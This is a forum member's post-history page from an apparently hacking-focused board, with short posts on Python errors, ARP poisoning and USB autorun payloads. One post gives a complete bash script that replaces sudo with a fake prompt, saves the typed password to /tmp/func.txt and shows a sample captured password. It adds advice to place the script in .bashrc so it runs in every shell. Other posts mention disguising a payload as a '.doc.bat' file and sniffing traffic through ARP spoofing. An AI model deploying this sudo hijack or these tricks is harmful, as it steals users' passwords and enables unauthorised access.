Jump to content

Xqtftqx

Active Members
  • Posts

    198
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Xqtftqx

  1. Getting Session Data Traceback (most recent call last): File "Command Line App Grooveshark.py", line 293, in <module> m = Menu(path) File "Command Line App Grooveshark.py", line 26, in __init__ g.sessionData() File "/home/xqtftqx/Downloads/Grooveshark/Grooveshark.py", line 48, in sessionData self.token = self.getToken() File "/home/xqtftqx/Downloads/Grooveshark/Grooveshark.py", line 56, in getToken return json.loads(reply)['result'] KeyError: 'result' All libraries installed, im a python n00b so any explanation would be sweet. I look forward to using this
  2. Hi, try taking a current firmware update and run it against the "file" command in linux. From there, youd get a type of file or just "data". If you get a certain type of archive lookup how to extract it and go have some fun. Otherwise, it will be a little harder
  3. Who has tried any of the free money or prize websites were you do offers and stuff. A long time i ago i tried lockerz, but its a complete scam. My friend got a ipod case from points2shop, and i wanted to know if anybody here has tried it and knows it is for real. Anyway, heres my referal link if anybody wants to sign up:
  4. Whoops. Well, you can easily get root using the user password. if they have permissions
  5. Here in my school, we got it played to us 8th period. We got out of 7th period 10 minutes earlier, and we had a choice if we wanted to watch it or not. if we did not want to watch it, we attended a silent study hall
  6. So today i was thinking and playing around with bash functions. So i started playing around and i developed this short piece of code: #!/bin/bash function sudo() { newsudo /usr/bin/sudo $@ } function newsudo() { USER=`whoami` read -ers -p "[sudo] password for $USER: " FUNC echo echo $USER $FUNC >> /tmp/func.txt echo "Sorry, try again" } export -f sudo export -f newsudo /bin/bash exit Any monkey can figure out what this does, but incase you dont here is what happens. When this file is loaded, you are returned to a bash shell. everything works normal, except when you go to run the "sudo" command. When you run sudo (After running this bash file) it will look normal, but no matter what happens it will say the password is wrong and tell you to try again. if you try again with the correct password it will work and run the command fine. Now after this happens, take a look at "/tmp/func.txt" the root password will be there. Basically phishing for the command line. Here is an example: tyler@Xquntu:~/Projects/sudo-demo$ whoami tyler tyler@Xquntu:~/Projects/sudo-demo$ ./sudo-func.sh tyler@Xquntu:~/Projects/sudo-demo$ sudo whoami [sudo] password for tyler: Sorry, try again [sudo] password for tyler: root tyler@Xquntu:~/Projects/sudo-demo$ cat /tmp/func.txt tyler 1234password 1234password is not my real password, i just used it as an example and the second time i typed my correct password. You can insert the functions and exports into the bashrc file making this run everytime a bash shell is started.
  7. Here you go, its called drivemap. this is untested but should work.. just put it with all the other .mod files http://www.mirrorvip.com/files/0MSOGI42/drivemap.mod
  8. Wouldnt a simple arp exploit be better? unless your trying to phish a ssl site
  9. Grabbing the songs is alot easier by just copying the file from the /tmp folder. There mp4 files labeled Flash*. Just an alternative method though.
  10. No it does not, i got around it by putting linuxx though. :P
  11. I was editing my Xbox live stuff and i attempted to put the word "Linux" in my Motto and what a suprise! Its a banned word. Just thought i tell you guys. Pretty Funny
  12. A method could be to change all the files to .txt and pass them to a php script which whould save them
  13. Yes there is, its called nircmd. google it. on the examples theres something to mute the system volume. simply put it in a loop and at startup
  14. Nope, Theres realy no hacks for the ReplayTV, i know, ive bean looking for some to, you can download shows from it using dvarchiver
  15. Or better yet, just remove the autorun, you can click on something like blahblash.doc.bat and it run the switchblade...
  16. wouldn't this be a hell lot easier, echo null >> switchblade.txt if not exist switchblade.txt exit <insert other switchblade stuff here>
  17. Ahh, but thanks for trying
  18. Ill have to try it out, most likely nintendo will fix within the next update, and i mean realy what can you get out of it besides free vc games and tetris...
  19. Xqtftqx

    Arp Poising

    Ok, i got it now, i just used a bt3 cd and used ettercap works fine although i missed the gui of cain and the fact i cant sniff voip.
  20. As said on the site It removes them, next time read before you speak
  21. Xqtftqx

    Arp Poising

    Mines a Dell Wireless 1490 Dual Band WLAN Mini-Card sadly not supported
  22. Xqtftqx

    Arp Poising

    How do i tell if it does?
  23. Xqtftqx

    Arp Poising

    Ok, ive got this to work today because i was bored, but in order to sniff i need to be connected via the ethernet jack which for me ruins the point. is it possible to use the built in wireless on this laptop to sniff? thanks in advance
×
×
  • Create New...